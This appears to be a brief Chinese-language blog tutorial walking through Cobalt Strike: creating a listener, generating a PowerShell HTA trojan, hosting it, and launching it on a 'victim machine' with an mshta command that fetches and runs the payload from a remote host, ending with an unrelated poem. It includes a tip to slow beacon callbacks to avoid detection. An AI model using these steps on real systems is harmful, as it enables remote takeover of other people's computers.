文章目录
0x01创建监听器
点击Cobalt Strike -> Listeners->Add,其中内置了九个Listener
0x02生成木马
- 点击Attacks->Packages->HTML Application,
- 选择对应的监听器,方法这里有三种(executable/VBA/powershell)
- 选择powershell,
- 点击Generate生成,
- 选择生成的路径及文件名保存即可。
0x03开启web服务
- 点击Attacks->Web Drive-by->Host File,
- 选择刚刚生成的木马evil.hta,
- 点击Launch生成下载链接
http://192.168.52.129:8080/download/file.ext
0x04 运行木马
- 打开受害机cmd,
- 运行mshta命令。
- mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件。
mshta http://192.168.0.102:80/download/file.ext
0x05返回CS即可看到
0x06 执行命令
- 选择interact,即可进行交互,由于受害机默认60秒进行一次回传,
- 为了实验效果我们这里把时间设置成5,
- 但实际中频率不宜过快,容易被发现。
0x07导出报告
摘抄
我将于茫茫人海中访我唯一灵魂之伴侣,
得之我幸,不得我命。
或得则吾生,不或则吾灭。
– 徐志摩